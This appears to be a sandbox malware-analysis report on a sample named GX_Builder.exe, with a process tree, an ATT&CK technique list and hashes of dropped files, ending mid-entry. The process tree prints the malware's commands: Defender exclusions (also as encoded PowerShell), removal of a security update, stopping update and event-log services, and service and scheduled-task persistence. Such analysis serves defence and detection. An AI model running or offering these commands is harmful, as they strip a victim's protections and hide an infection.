  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9920 /prefetch:1
  2⤵
  PID:7144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9976 /prefetch:1
  2⤵
  PID:6408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
  2⤵
  PID:6432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11068 /prefetch:1
  2⤵
  PID:6580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10956 /prefetch:1
  2⤵
  PID:6584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9836 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4948 /prefetch:2
  2⤵
  PID:8152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:6940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,10986381654882446791,6982857241754298272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9768 /prefetch:1
  2⤵
  PID:7380

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3396

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2204

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:8104

C:\Users\Admin\Downloads\GX_Image_Logger\GXImageLogger\GX_Builder.exe
"C:\Users\Admin\Downloads\GX_Image_Logger\GXImageLogger\GX_Builder.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:4820
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAeQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcQBsACMAPgA="
  2⤵
  PID:4196
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  PID:5076
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  PID:4324
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    PID:5836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:7024
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:7212
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7660
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:6384
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:380
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:6000
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:7564
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:6364
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:7000
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:4360
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:7772
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GMDTJRUT"
    3⤵
    - Launches sc.exe
    PID:7768
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:7828
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2740
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GMDTJRUT"
    3⤵
    - Launches sc.exe
    PID:2136
- C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
  2⤵
  PID:7288
- - C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe
    "C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"
    3⤵
    PID:7440
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmp60B4.tmp" /F
      4⤵
      Creates scheduled task(s)
      PID:3536
- C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
  "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
  2⤵
  PID:7012
- C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
  "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
  2⤵
  PID:6744
- - C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
    "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
    3⤵
    PID:232
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      PID:5612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff25ee46f8,0x7fff25ee4708,0x7fff25ee4718
        5⤵
        
        PID:1440

C:\Users\Admin\Downloads\GX_Image_Logger\GXImageLogger\GX_Builder.exe
"C:\Users\Admin\Downloads\GX_Image_Logger\GXImageLogger\GX_Builder.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:4948
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAeQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcQBsACMAPgA="
  2⤵
  PID:4496
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  PID:7528
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  PID:764
- C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
  2⤵
  PID:7020
- C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
  "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
  2⤵
  PID:4240
- C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
  "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
  2⤵
  PID:8104
- - C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
    "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
    3⤵
    PID:7728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      PID:1836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7fff25ee46f8,0x7fff25ee4708,0x7fff25ee4718
        5⤵
        
        PID:7332

C:\Users\Admin\Downloads\GX_Image_Logger\GXImageLogger\GX_Builder.exe
"C:\Users\Admin\Downloads\GX_Image_Logger\GXImageLogger\GX_Builder.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:7036
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAeQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcQBsACMAPgA="
  2⤵
  PID:6864
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  PID:4584
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  PID:4408
- C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
  2⤵
  PID:1700
- C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
  "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
  2⤵
  PID:6876
- C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
  "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
  2⤵
  PID:7984

C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
1⤵
PID:7176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WinErrorMgr.exe.log

Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e494d16e4b331d7fc483b3ae3b2e0973

SHA1
d13ca61b6404902b716f7b02f0070dec7f36edbf

SHA256
a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165

SHA512
016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0764f5481d3c05f5d391a36463484b49

SHA1
2c96194f04e768ac9d7134bc242808e4d8aeb149

SHA256
cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3

SHA512
a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
38KB

MD5
2b7ec9fe5044c75348bc52964bf50b78

SHA1
039e784c53ba423877c5c845ffb044abbf4c110e

SHA256
71c9403962b1f930169325d2c812125a0088d2a695609486bb6f31185e84ff97

SHA512
92cb64599e198177093bda32e1c962fdccaa049d9875292b97c6b014d0d0afde750dcef27151751dda3f8639df41bed611bce7816c04d4e581b17b132d169016

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
19KB

MD5
cdc8eebc5968b93310be705973258f07

SHA1
9330a2fdd0c76768176dfc208e575a0f14e9c8c4

SHA256
caf19c50017498e002e2db63f5f69ed0df35b84831b6faae80c6c7272fdf88d4

SHA512
2cce3b115f4e0115c21f9790320b41f2715d550793cf8d65e462758cb16371ff063a330ab1291a1adcba6a63b994a32b476ff95b14eb88052455952f6f223fab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\27ca42a687428cc6_0

Filesize
52KB

MD5
4e447e06a472337bf161ecfd8a7be8ba

SHA1
9d712ea0c859fb3c38fdbbb3094dd952aad4190b

SHA256
efc26e1822f98a092350c2cb55c3540d4dba01756e4536cae9bf2830f4c6b7ea

SHA512
045904129d5a70fb60f2b609cf0321d89e883ef8ec3c2200aad3ed1d825eac729f0a351234e7ee85ffa11f105ee9e7a2abbdef0ee49d19313a85d2c7dae1ced3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
697ab051d99e6dafca495a90f5634078

SHA1
e4ffe3a57ab60cb3500d7ee78e41daae6eb179a7

SHA256
3a8b4f66515d77d4c361948a3764779f6c701e234a1c4d050db88c19763a27dc

SHA512
0f0473ab5807a6379dceb4220ada8b70d62d190added2ac7ba83737ff15509e6a8a95a7c187e96f9b55cfa9d4421e6b0df9f27790be126700aabcb1bc331adbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
89b9dcb6b5e2fd0c4b4699fed3978ee4

SHA1
0e262cc6634e6d2ae1f79a6a792ac17fd84b2b68

SHA256
0656b544cb431bf1ec435f822d3c0549e4c013b1d427c937b419cfaa4f0bbfae

SHA512
6656142476061929df3cd4e76308657d9e7cf8cf2e48216bba44aded009cd133d4757de727ac76854b089d27d3c2eff9e3feb3b477794f75b232de413bfc040b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
fce0fe0dc06243471f6e2b1792c27172

SHA1
1161308aa43a6f83ce2b4bc4f94fa7c7e9047d9c

SHA256
f6071dbcd3026ae502990687c09dc8f5bc79463e23ac5ff35e55e023e1974e52

SHA512
56c67500864702f979dffd50cf781ced557bcd286e6bb4e26fe03e46ae1df6d90a6a90cf3f1bcb8a885b6a2237160424e0141eabead03880df1adcabb5ad85f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
12KB

MD5
d317d63190888bda203e32e192522801

SHA1
f094ce8bdbbf482a8500be74eb0a6015808847cd

SHA256
d82b673d66a3be6575137ea72fa12b814a8d63bf5c83bdba952417171e1c43bc

SHA512
b0f0b6be5443b3b9adcc1ea72a5f0ff330b79fc1cdc78f135a2b79f528128b7836c9690d160ed63c7f0e19241243ce1acfbcbd2ceb76f7ddb983fbdb3a4704ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6416a641430b0d8fab052505967114fd

SHA1
afb82aeef6804fe6bcf0e12b66cf4107898a9c74

SHA256
e51f06553402138f770129ef8c1598621ec0bb462d51c65d0730a76727a3712f

SHA512
565acdadb14ede68843a6a57ce0371cf398394efc59b016d8d23ec1d8cdf8a6c426cacdf480f12e0b29b8babcf2738645624a7d019f5cf373a0210bb650fae2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
14KB

MD5
c686c63ee3cd0ab72ae18cb20d42df14

SHA1
4a0ccb32ce0b550ad1ed3c9deff59140dfefb326

SHA256
0febf6d3eba44b2e915fb9b2805b4251848861e1ab85fd88147fb88cb5054a39

SHA512
0df495347265b2fc82e05d637bf3262c24807bf5ac9135faf255215c91841d6a1fb66e5b4727fd529e0f028dd65a43de6be6c0f97b7b2c089b0ecae5c5b6775e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
856551f83418e2b033152cc89dfc52e3

SHA1
60a26f908c85d8d136f5afe28ab78e2079dd5f39

SHA256
d8a8a4b5538cb7b2c203108f205db1cd0e9a87a37389c34e5fbfc588e08e3f30

SHA512
8dd8e46beb6bebfd36febb5c4767c3cb24da2d0e8d0d1cd784e0b9fc139bf940866e8f3d0212e24692e49fd486c1144c0395f087ac8551bef9c45db92359e400

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
d3e3e25efdcfae20d0c29238516c8b56

SHA1
daf2e992b71a005de13c371a56ad8a7a7c2842ea

SHA256
2f9692826e06ad8a45b4216145a4c72d4a652e07278eefd0ec92a28c8c4e0f33

SHA512
48c1a2786b0ed19d99b4da5d831fb2c31c16a23b374c9964af8b3d9bf6fdeadfd80f743d4f1a8c5c491ce9bcdbec725af92a87c6341ee6e69b2ccccbc7edaf56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
7b3a713e8b5eb7dae762301e5b27efac

SHA1
251c66f4294ebc0a4a846664b3e2d2cae8aceac0

SHA256
fc00420f49d6ae5f383e964ca80eee8fa4f0ea01e3613a0dca9160f1dd4f9caa

SHA512
552f5a9a38c2326cc871db2d2f31c0f54f2c3b32937ef9d7995f7674cce2a7c1402b1dec7d5d0e3da4099b6b537379066fb332e4ab8333d2436b033fbeeaef76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
d7cc758bc77c9e4bfad76237689772b7

SHA1
36dfd2d531ac9f65b330434ac80f215ca63fe4ba

SHA256
1a5a55386226459649177761612951af1b9f1d32b37e6c0b34168a874d953f51

SHA512
a76e17be127ff82716a381060e63a0f91a547227f5c36bebf265026b4ee24e1e4c7a95c2da2b751c93269f9c1c18a274a82f3a8fdfbc040a6e826173acba8052

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
b74988a414e43ed6312715a6d21416b2

SHA1
61d7aeb1655bbfe0393b6b699d0c50403254ca12

SHA256
c5cf601cfe99d683713729a4f5f1c149f68c3a7aacadff0aebf3b6db9cb0593e

SHA512
3474c19a7670df99551216cb1b1d7114ec478d659fcda74353709e23430e5948e1e9d9b0ef490fcfc2583093d92ce29789466b37a7c42112a271572d2bcf14b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c89f.TMP

Filesize
872B

MD5
9119c3db6d88b06591878dad10e545b2

SHA1
6827ca0f71ab3e9258332c8cfde4f54eb9c91c12

SHA256
f193a3d641ca961daf923e20550cbd2f1e5df8680170449a5742c327ffbdb49b

SHA512
9a3dbbc3fa80895387adbd87c173b22e1a3d999345f829593bfd7a1b405c027378004ceb85ed545862310f7d795afa71a78c1dd687ac0e28303ecf3dd25e7698

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
d83309b2b889a7c8b254adf13da47f43

SHA1
87dd1c119cdc3eb2404024ecc73b14a3ca1da8c0

SHA256
769d63a7db8920dfdd1ff2610ee34097b2fbed52de8393959335f4cc2b5fbd2b

SHA512
1a1bbe56e7d7a81b2776237d3d3c084e2744553851bd5cfff07521ced020eef66eae057a0419257d16f1cdcd23c539cf96dc4f76cd8cfadb031c23c65b40d232

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\b33acaa9-ebf2-473b-9a5f-e8b3722b502d.tmp

Filesize
11KB

MD5
e8c168b827ca31bbf47bf15b85b802a3

SHA1
a97e4fd233a7ffcd19977ecc268301b17c1b170b

SHA256
826f46b44f1b70f6d33a7707e81ec5b81036cbff75a82d28a8223aa287aa3808

SHA512
d42ff18e9c93f4ec94337c931a9f7929e8794037ff17381fb96142ba3782c8996117157c5658fc36a4645cc45c84ed845fa0667b94abc8ea9ed21a47c379e751

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe

Filesize
191KB

MD5
e004a568b841c74855f1a8a5d43096c7

SHA1
b90fd74593ae9b5a48cb165b6d7602507e1aeca4

SHA256
d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db

SHA512
402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af

Download Submit
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe

Filesize
3.6MB

MD5
2da2599799ed01532ed7c95958a66af2

SHA1
94989b709e1cf5e6417419006272dd92b13f3580

SHA256
d7a45c7f2c3a0bf1405bdc09374fe2913d35dffc16fce667181f5074d44401d1

SHA512
adadcfae93d4a8fc1a88b639c89d9071ca3c6363a1b0f9273ec71286bbb43a5f334e92b7fb4e730e496569b229df26c4ea23dfb79554f78ea4eaea9bd8e9bdab

Download Submit
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe

Filesize
1.2MB

MD5
7a76975663c5d3de06bcc8103f9d7afb

SHA1
80a2aa7a179b49aa29bb3529f30a5ea9071963a8

SHA256
0a8306776765f5b1e9542b6a7fad426e9d47a31edccaf651726cd9865e319e0f

SHA512
4d5a7faa62eddeaa1b90607c7a3e8da94a2487d3c7b14f3575a57f82e41ad22b6a8f46586de5d8ffdbc725e69012fac0d850b510111a08b1031d00eed0edd4b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe

Filesize
1024KB

MD5
08ec03e536e385694bfffe1569ce5dfd

SHA1
2745a4491a98ca9752e5435e18ece585b35f539e

SHA256
4d4abf3dd6287e4b389a78224bfb448586a0bd00e8d739a8fd45c9a6135a3568

SHA512
2f620f1ae26ff8499cf3854d897a130dae4a0e6caf633b733a2b90e00ef60f744d5a503a576edc0b7c4a12ffab8774cf28a49233e8d6c9930a7d33cf015cd905

Download Submit
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe

Filesize
3.9MB

MD5
af3a2de64533ea55264f40674edb6aa1

SHA1
36983f7771e54f0c7e9060de231cdf5fba540638

SHA256
9eb1e763856974544d05e6a427d9bc85d397e34b39bb4904cd3abce62ba60370

SHA512
dbd336ec8549b5b61b045ef8b1747715556778b46060790dbf6d27aaf30a2d13f2ee2e7a9348baa251d1f8623bec8ae035db639fb0510e653a17f14e8c8319bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe

Filesize
64KB

MD5
a8d47e1e695ebaf8e0cfaabf0c14105e

SHA1
246c6954dc39902deac6454da0664f4f28d1db6f

SHA256
